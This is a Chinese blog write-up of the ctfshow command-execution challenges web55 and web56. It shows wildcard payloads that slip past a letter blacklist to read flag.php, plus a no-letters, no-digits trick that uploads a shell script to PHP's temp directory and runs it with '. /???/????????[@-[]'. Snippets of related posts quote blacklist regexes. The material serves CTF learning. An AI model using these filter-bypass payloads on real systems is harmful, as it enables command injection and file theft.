命令执行web55-56

最新推荐文章于 2024-07-14 18:35:17 发布
最新推荐文章于 2024-07-14 18:35:17 发布
阅读量346 收藏 7
点赞数 8
文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/DJmutu/article/details/135719792
版权

web55

解法1

这道题把26个字母都禁用了,但是没有禁用数字,所以我们可以用bin目录下的一些重要的执行文件,例如cat、cp、chmod df、dmesg、gzip、kill、ls、mkdir、more、mount、rm、su、tar、base64等。

由于禁用字母,但base64内有数字,所以我们接下来的思路就是用通配符?来进行匹配。

?c=/bin/base64 flag.php

这是我们实际要用的命令。

?c=/???/????64 ????.???

这是用了通配符的命令,因为有64的存在所以,匹配的就会更精确。

然后解码

拿到flag

解法2

无字母数字webshell

我们可以上传一个post包,如果php接受了这个包,那么我们上传的文件就会被存在php的一个临时文件下(请求结束后会删除临时文件),这个临时文件默认文件名为/tmp/phpXXXXXX,

文件名的后六位是随机的大小写字母和数字,下面是一个post包

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>POST数据包POC</title>
</head>
<body>
<form action="http://14fde086-908c-45a7-a693-6e56815055af.challenge.ctf.show/" method="post" enctype="multipart/form-data">
<!--链接是当前打开的题目链接-->
    <label for="file">文件名:</label>
    <input type="file" name="file" id="file"><br>
    <input type="submit" name="submit" value="提交">
</form>
</body>
</html>

下面是post包的html界面,我们随便上传一个文件,我这的1.txt很随意,没有具体含义,不影响做题。

然后我们开始bp抓包

接着鼠标右键把内容发送到repeater

把多余的东西删去

按图输入

?c=.%20/???/????????[@-[]
#!/bin/sh

shell程序必须以"#!/bin/sh"开始,#! /bin/sh 是指此脚本使用/bin/sh来解释执行,#!是特殊的表示符,其后面跟的是解释此脚本的shell的路径

以及执行内容

tac flag.php

最后拿到flag

web56

这一题比web55禁用的多了数字,所以bin的执行文件就用不了了,但我们还可以用无字母数字webshell。

步骤与web55类似

最后拿到flag

DJmutu
关注
  • 8
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctfshow web入门 命令执行后篇(web55-web188)
ccfly1012的博客
09-04 1934
web55 <?php ​ /* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-07 20:03:51 # @email: h1xa@ctfer.com # @link: https://ctfer.com ​ */ ​ // 你们在炫技吗? if(isset($_GET['c']..
[ctfshow]web入门——命令执行web54-web71)
ShenZ的博客
12-01 3985
文章目录web54 web54
web入门 命令执行 web53-web55
博客地址 www.sec0nd.top
04-11 3096
文章目录web53web54web55 web53 <?php if(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_match("/\;|cat|flag| |[0-9]|\*|more|wget|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\</i", $c)){ echo($c); $d = sys
ctfshow web入门 命令执行:55-57
rawrecruit的博客
04-04 4715
ctfshow web入门 命令执行篇的个人刷题记录。
ctfshow命令执行web30-39
m0_62584974的博客
04-05 1526
ctf的命令执行
Ctfshow Web入门 命令执行 Web31-74
qq_45427131的博客
10-21 2581
CtfShow Web入门-命令执行 感谢Y4师傅!看Y4的Wp真的学到好多! Web31 过滤条件: flag\system\php\cat\sort\shell\小数点\空格\单引号 执行passthru()查看flag 绕过cat使用tac more less head tac tail nl od(二进制查看) vi vim sort uniq 绕过空格用%09 <> ${IFS} $IFS$9 {cat,fl*} %20 flag绕过可以用通符代替 执行echo查看flag echo
ctfshow-web入门-命令执行web37-web40)
Welcome To Myon'Blog !
06-07 1676
中间件的日志文件会保存网站的访问记录,比如HTTP请求行,User-Agent,Referer等客户端信息,如果在HTTP请求中插入恶意代码,那么恶意代码就会保存到日志文件中,访问日志文件的时候,日志文件中的恶意代码就会执行,从而造成任意代码执行甚至获取shell。将我们想要执行的代码包含进去,其实和 php://input 是一样的,让用户可以控制输入流,当它与文件包含函数结合时,用户输入的 data:// 流就会被当作 php 文件执行。就会显示容器有问题了。我们也可以采用编码绕过,对
用CTFShow例题练习命令执行web41-web60
qq_54502707的博客
02-08 3187
Hello~大家好,这里是KOKO! 之前对CTFShow的命令执行类部分题目做了记录,今天我们继续做后续的题目
CTFshow刷题日记-WEB-命令执行55-77
Love&Share
09-04 3455
web55 if(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\</i", $c)){ system($c); } 不能出现英文字符 方法1 ?c=/???/????64 ???????? 但是这个不是通用的,base64不是每个机器都用 方法2 bzip2的使用 bzip2是linux下面的压缩文件的命令 我们可以通过该命令压缩fla
CTFshow-WEB入门-命令执行
feng的博客
01-20 8707
web29 ?c=system("cat fla*.php"); 或者 连蚁剑得flag。 web30 或者其他姿势,因为过滤太少,命令执行得函数很多,绕过姿势也很多,因此不列举了。 web31 或者 ?c=echo`tac%09fl*`; web32 利用自己以前没有注意过得一个点。 if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){ 过滤了括号和分号确实有些难受。过滤了括号只能用无括号的
CVE-2020-24581 D-Link DSL-2888A 远程命令执行漏洞分析1
08-03
D-Link DSL-2888A是一款由D-Link公司制造的统一服务路由器,它在AU_2.31_V1.1.47ae55之前的版本中存在一个严重的安全漏洞,即CVE-2020-24581,这是一个授权问题导致的远程命令执行漏洞。此漏洞的成因在于路由器固件...
apache-tomcat-8.5.55.tar.gz
05-21
在终端中输入以下命令下载`apache-tomcat-8.5.55.tar.gz`: ```bash wget https://downloads.apache.org/tomcat/tomcat-8/v8.5.55/bin/apache-tomcat-8.5.55.tar.gz ``` 下载完成后,使用以下命令解压文件: ```...
OM-SrvAdmin-Dell-Web-LX-9.5.0-4063_A00.tar.gz
07-07
《戴尔服务器Web管理工具OM-SrvAdmin-Dell-Web-LX 9.5.0-4063_A00详解》 在IT行业中,有效地管理和监控服务器是至关重要的,尤其是在数据中心或大规模网络环境中。戴尔作为全球知名的服务器制造商,提供了丰富的...
apache-tomcat-8.5.55.tar.zip
05-26
2. 解压后的结果是一个.tar文件,可以使用`tar -xvf apache-tomcat-8.5.55.tar`命令将其解压到当前目录。 解压完成后,你会看到一个名为“apache-tomcat-8.5.55”的目录,其中包含了Tomcat的所有组件,如bin(包含...
jre-7u55-linux-x64.gz
12-04
压缩包子文件的文件名称“jre1.7.0_55”表明它是Java 7更新55的安装包,这个文件解压后将包含Java运行时环境的各个组件,如bin目录下的可执行文件(如java、javaws等),lib目录下的类库,以及其他的配置文件和文档...
【持续集成_05课_Linux部署SonarQube及结合开发项目部署】
weixin_42333261的博客
07-12 156
前置条件:sonarQube不能使用root账号进行启动,所以需要创建普通用户及。3)CMD上传qube文件-不能传到home路径下哦。2)添加用户、组名、密码。4)检查并解压上传的包。
linux的学习(四):磁盘,进程,定时,软件包的相关命令
最新发布
weixin_45037073的博客
07-14 794
关于磁盘管理,进程管理,定时任务,软件包管理的命令的使用。
Linux 安装 Docker Compose
m0_63004677的博客
07-12 307
Linux 系统安装 Docker Compose
Linux】 GCC/G++与Makefile使用
Long_kin的博客
07-11 990
收藏向 使用解析
ctfshow web55
08-24
- *1* [ctfshow web入门55~122 命令执行](https://blog.csdn.net/qq_53063436/article/details/117386793)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值